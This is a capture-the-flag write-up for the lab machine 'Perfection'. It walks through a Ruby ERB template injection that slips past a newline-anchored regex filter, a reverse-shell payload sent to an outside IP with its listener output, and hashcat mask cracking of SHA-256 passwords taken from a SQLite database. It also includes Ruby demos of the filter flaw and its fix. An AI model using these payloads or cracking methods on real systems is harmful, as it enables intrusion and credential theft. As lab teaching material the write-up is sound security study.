Perfection

Recon

nmap_scan.log

HTTP (80)

Website allows us to calculate weights:

Headers:

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 12 May 2024 16:37:00 GMT
Content-Type: text/html;charset=utf-8
Connection: close
X-Xss-Protection: 1; mode=block
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
Server: WEBrick/1.7.0 (Ruby/3.0.2/2021-07-07)
Content-Length: 5304

The second Server header (WEBrick/1.7.0, Ruby/3.0.2) shows the backend is Ruby, so ERB template syntax (<%= %>) is the natural thing to try. Entering any special character in the form fields returns "Malicious character detected".

After playing around with the parameter, the filter appears to apply its regex only to the first line of the value: in Ruby, ^ and $ match at line boundaries rather than at the start and end of the string, so a value whose first line is clean passes even if a later line contains anything at all. Prepending a newline (%0A) to an ERB SSTI payload confirms it; the expression is evaluated and its result rendered:
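The anchor problem in miniature, as an added example (not the box's own code): a hypothetical filter built with ^ and $ lets a multi-line value through because only the first line has to match, while the same class anchored with \A and \z rejects it. The input strings and the "Weight for:" template are constructed for the demo; the ERB rendering is what turns the passed-through second line into code execution.

```ruby
require 'erb'

# Constructed inputs for the demo (not taken from the box).
BENIGN_INPUT = "apples"
BYPASS_INPUT = "apples\n<%= 7 * 7 %>"   # newline, then an ERB tag

# Hypothetical filter in the style the writeup describes. It looks sane,
# but in Ruby ^ and $ anchor to LINE boundaries, so only the first line
# of the value has to be clean.
def weak_filter_allows?(value)
  value.match?(/^[a-zA-Z0-9 ]+$/)
end

# Hardened version: \A and \z anchor to the start and end of the whole
# STRING, so a second line containing <%= %> is rejected.
def strict_filter_allows?(value)
  value.match?(/\A[a-zA-Z0-9 ]+\z/)
end

# Stand-in for the vulnerable sink: user input is concatenated into an
# ERB template and rendered, which is what makes this SSTI.
def render_unsafe(value)
  ERB.new("Weight for: #{value}").result(binding)
end

# Runs the chosen filter and returns what the sink would output, or the
# rejection message, so the bypass can be checked without a server.
def handle(value, filter)
  return "Malicious character detected" unless send(filter, value)
  render_unsafe(value)
end

if __FILE__ == $PROGRAM_NAME
  puts handle(BENIGN_INPUT, :weak_filter_allows?)
  puts handle(BYPASS_INPUT, :weak_filter_allows?)    # second line is evaluated: 49
  puts handle(BYPASS_INPUT, :strict_filter_allows?)  # rejected
end
```

The same check against real input: if a Ruby app validates with /^...$/ and you get "malicious character" errors, try the payload on a second line before giving up on it.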

Reverse Shell

URL-encode the reverse shell payload, keep the leading %0A newline in front of it so it lands on the second line, and send it:

<%= `bash -c 'exec bash -i &>/dev/tcp/10.10.16.74/4444 <&1'` %>
---
%0A%3C%25%3D%20%60bash%20%2Dc%20%27exec%20bash%20%2Di%20%26%3E%2Fdev%2Ftcp%2F10%2E10%2E16%2E74%2F4444%20%3C%261%27%60%20%25%3E
┌──(woyag㉿kraken)-[~/Desktop/Rooms/Perfection]
└─$ pwncat -lp 4444
[12:49:48] Welcome to pwncat 🐈!                                            __main__.py:164
[12:49:55] received connection from 10.10.11.253:44456                      bind.py:84
[12:49:58] 10.10.11.253:44456: registered new host w/ db                    manager.py:957
(local) pwncat$
(remote) susan@perfection:/home/susan/ruby_app$ id
uid=1001(susan) gid=1001(susan) groups=1001(susan),27(sudo)
(remote) susan@perfection:/home/susan/ruby_app$ 

User.txt

(remote) susan@perfection:/home/susan$ cat user.txt
07bfcbde41110ef6e7077d6ad3ecef4c

LinPeas

Pasted_image_20240512210332.png
(remote) susan@perfection:/home/susan$ cd /var/mail
(remote) susan@perfection:/var/mail$ cat susan
Due to our transition to Jupiter Grades because of the PupilPath data breach, I thought we should also migrate our credentials ('our' including the other students

in our class) to the new platform. I also suggest a new password specification, to make things easier for everyone. The password format is:

{firstname}_{firstname backwards}_{randomly generated integer between 1 and 1,000,000,000}

Note that all letters of the first name should be converted into lowercase.

Please hit me with updates on the migration when you can. I am currently registering our university with the platform.

- Tina, your delightful student

Hmmm... I encountered a database file earlier but thought it wasn't crackable, so let's get to it!

(remote) susan@perfection:/home/susan/Migration$ ls
pupilpath_credentials.db
(remote) susan@perfection:/home/susan/Migration$ sqlite3 pupilpath_credentials.db
SQLite version 3.37.2 2022-01-06 13:25:41
Enter ".help" for usage hints.
sqlite> .table
users
sqlite> .mode json
sqlite> SELECT * FROM users;
[{"id":1,"name":"Susan Miller","password":"abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f"},
{"id":2,"name":"Tina Smith","password":"dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57"},
{"id":3,"name":"Harry Tyler","password":"d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393"},
{"id":4,"name":"David Lawrence","password":"ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a"},
{"id":5,"name":"Stephen Locke","password":"154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8"}]

Since the box has only one local user, susan, we only need to crack her hash. The hashes are 64 hex characters, i.e. unsalted SHA-256 (hashcat mode 1400), and the mail hands us the format: the prefix susan_nasus_ is fixed and only the integer suffix varies.

Using hashcat in mask attack mode (-a 3) we can crack it without writing any code or worrying about threading ourselves (password is the file holding the hash). Note the mask as written only covers nine-digit suffixes, which happened to be enough here; adding --increment would also try shorter ones:

┌──(woyag㉿kraken)-[~/Desktop/Rooms/Perfection]
└─$ hashcat -m 1400 -a 3 password 'susan_nasus_?d?d?d?d?d?d?d?d?d'
...
abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f:susan_nasus_413759210
...
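What the mask attack above is doing, as an added example (not part of the original writeup): the mail's password spec becomes a hashcat mask, each candidate is hashed with plain SHA-256 and compared to the stored digest, and the recovered password is verified against Susan's hash from pupilpath_credentials.db. The range passed to crack is deliberately narrow; the full 1..1,000,000,000 space is what hashcat is for.

```ruby
require 'digest'

# Susan's SHA-256 digest from pupilpath_credentials.db (from the writeup).
SUSAN_HASH = "abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f"

# Turns the password spec from the mail into a hashcat mask:
# {firstname}_{firstname backwards}_{up to `digits` decimal digits}.
def build_mask(first_name, digits: 9)
  name = first_name.downcase
  "#{name}_#{name.reverse}_#{'?d' * digits}"
end

# One candidate plaintext for a given integer suffix.
def candidate(first_name, n)
  name = first_name.downcase
  "#{name}_#{name.reverse}_#{n}"
end

# Checks a single candidate against a stored unsalted SHA-256 hex digest.
# No salt and a fast hash are exactly why a mask attack is cheap here.
def verify(first_name, n, target_hex)
  Digest::SHA256.hexdigest(candidate(first_name, n)) == target_hex
end

# Brute-forces a range of suffixes the way the mask attack does.
# Returns the plaintext, or nil if nothing in the range matches.
def crack(first_name, target_hex, range)
  range.each do |n|
    return candidate(first_name, n) if verify(first_name, n, target_hex)
  end
  nil
end

if __FILE__ == $PROGRAM_NAME
  puts build_mask("Susan")                                  # the mask used with hashcat
  puts crack("Susan", SUSAN_HASH, 413_759_000..413_760_000) # narrow window for the demo
end
```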

Root.txt

susan is a member of the sudo group (see the id output above), so her cracked password is all we need:

susan@perfection:~$ sudo -l
[sudo] password for susan:
Matching Defaults entries for susan on perfection:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User susan may run the following commands on perfection:
    (ALL : ALL) ALL

susan@perfection:~$ sudo su
root@perfection:/home/susan# cd
root@perfection:~# ls
root.txt
root@perfection:~# cat root.txt
4559e764aba051c61c10ed9abca32dfe
